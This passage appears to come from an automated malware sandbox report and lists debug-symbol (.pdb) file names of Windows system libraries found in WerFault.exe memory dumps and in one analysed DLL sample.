                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdb3 source: WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp
                      Source: Binary string: sfc_os.pdb' source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb8 source: WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdbX source: WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000009.00000003.427340993.0000000004FF1000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.423591311.0000000002A98000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.605759791.00000000051F1000.00000004.00000001.sdmp, WerFault.exe, 0000001C.00000003.589251650.0000000003399000.00000004.00000001.sdmp, WerFault.exe, 0000001E.00000003.609217077.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 00000009.00000003.427375651.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.517865960.0000000004DE0000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605811960.00000000051C0000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606439459.00000000055B0000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609305997.0000000004C30000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: opengl32.pdbv source: WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp
                      Source: Binary string: ws2_32.pdbx source: WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdbA source: WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 00000009.00000003.427375651.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.511740943.0000000004DE2000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605811960.00000000051C0000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606439459.00000000055B0000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609305997.0000000004C30000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp
                      Source: Binary string: opengl32.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdbO source: WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp
                      Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: shell32.pdbk source: WerFault.exe, 00000009.00000003.427375651.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.511740943.0000000004DE2000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605811960.00000000051C0000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606439459.00000000055B0000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609305997.0000000004C30000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdbi source: WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb] source: WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp
                      Source: Binary string: nsi.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: ClusApi.pdb@q source: WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdb0 source: WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdbb source: WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 0000000C.00000003.511740943.0000000004DE2000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606439459.00000000055B0000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb/d source: WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: rasapi32.pdbW source: WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb[ source: WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000009.00000003.427340993.0000000004FF1000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.508553143.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.605759791.00000000051F1000.00000004.00000001.sdmp, WerFault.exe, 0000001C.00000003.606391797.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 0000001E.00000003.609217077.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdb| source: WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdb|, source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp
                      Source: Binary string: opengl32.pdb5 source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp
                      Source: Binary string: FGERN.pdb source: 3c271eae_by_Libranalysis.dll
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000009.00000003.427375651.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.511740943.0000000004DE2000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605811960.00000000051C0000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606439459.00000000055B0000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609305997.0000000004C30000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000009.00000003.427375651.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.517865960.0000000004DE0000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605811960.00000000051C0000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606439459.00000000055B0000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609305997.0000000004C30000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 00000009.00000003.427340993.0000000004FF1000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.508553143.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.588054272.0000000002E95000.00000004.00000001.sdmp, WerFault.exe, 0000001C.00000003.606391797.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 0000001E.00000003.609217077.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000C.00000003.424911525.0000000002A92000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.590103743.0000000002EA1000.00000004.00000001.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdbhq source: WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb_ source: WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000009.00000003.427340993.0000000004FF1000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.508553143.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.605759791.00000000051F1000.00000004.00000001.sdmp, WerFault.exe, 0000001C.00000003.606391797.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 0000001E.00000003.609217077.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: advapi32.pdbc source: WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb+ source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp
                      Source: Binary string: a'pjr*pCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000C.00000002.574931083.0000000000632000.00000004.00000001.sdmp
                      Source: Binary string: oleaut32.pdb)d source: WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp
                      Source: Binary string: ClusApi.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: glu32.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 00000009.00000003.427375651.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.511740943.0000000004DE2000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605811960.00000000051C0000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606439459.00000000055B0000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609305997.0000000004C30000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000009.00000003.427340993.0000000004FF1000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.508553143.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.605759791.00000000051F1000.00000004.00000001.sdmp, WerFault.exe, 0000001C.00000003.606391797.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 0000001E.00000003.609217077.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdbk source: WerFault.exe, 00000009.00000003.427340993.0000000004FF1000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.605759791.00000000051F1000.00000004.00000001.sdmp, WerFault.exe, 0000001E.00000003.609217077.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 00000009.00000003.427375651.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.511740943.0000000004DE2000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605811960.00000000051C0000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606439459.00000000055B0000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609305997.0000000004C30000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdb2 source: WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdb|q source: WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000009.00000003.427340993.0000000004FF1000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.508553143.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.605759791.00000000051F1000.00000004.00000001.sdmp, WerFault.exe, 0000001C.00000003.606391797.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 0000001E.00000003.609217077.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: rasapi32.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: rasman.pdbR source: WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000009.00000003.427340993.0000000004FF1000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.508553143.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.605759791.00000000051F1000.00000004.00000001.sdmp, WerFault.exe, 0000001C.00000003.606391797.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 0000001E.00000003.609217077.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb& source: WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdbT source: WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: ClusApi.pdbt source: WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdb3 source: WerFault.exe, 0000000C.00000003.517865960.0000000004DE0000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdb=d source: WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000C.00000003.423735765.0000000002A8C000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.588098874.0000000002E9B000.00000004.00000001.sdmp, WerFault.exe, 0000001C.00000003.588684577.000000000338D000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: setupapi.pdb* source: WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000009.00000003.427340993.0000000004FF1000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.508553143.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.605759791.00000000051F1000.00000004.00000001.sdmp, WerFault.exe, 0000001C.00000003.606391797.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 0000001E.00000003.609217077.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: rasman.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: dnsapi.pdbpq source: WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdbbq source: WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000009.00000003.427375651.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.511740943.0000000004DE2000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605811960.00000000051C0000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606439459.00000000055B0000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609305997.0000000004C30000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdb|% source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb0 source: WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp
                      Source: Binary string: sfc_os.pdb5 source: WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp
                      Source: Binary string: oleaut32.pdbq source: WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdb( source: WerFault.exe, 0000000C.00000003.423542715.0000000002A86000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.588054272.0000000002E95000.00000004.00000001.sdmp
                      Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdbe source: WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000009.00000003.427375651.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.517865960.0000000004DE0000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605811960.00000000051C0000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606439459.00000000055B0000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609305997.0000000004C30000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000009.00000003.427375651.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.517865960.0000000004DE0000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605811960.00000000051C0000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606439459.00000000055B0000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609305997.0000000004C30000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000C.00000003.423591311.0000000002A98000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.588185425.0000000002EA7000.00000004.00000001.sdmp, WerFault.exe, 0000001C.00000003.589251650.0000000003399000.00000004.00000001.sdmp
                      Source: Binary string: rasapi32.pdbvq source: WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000009.00000003.427340993.0000000004FF1000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.508553143.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.605759791.00000000051F1000.00000004.00000001.sdmp, WerFault.exe, 0000001C.00000003.606391797.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 0000001E.00000003.609217077.0000000004C61000.00000004.00000001.sdmp
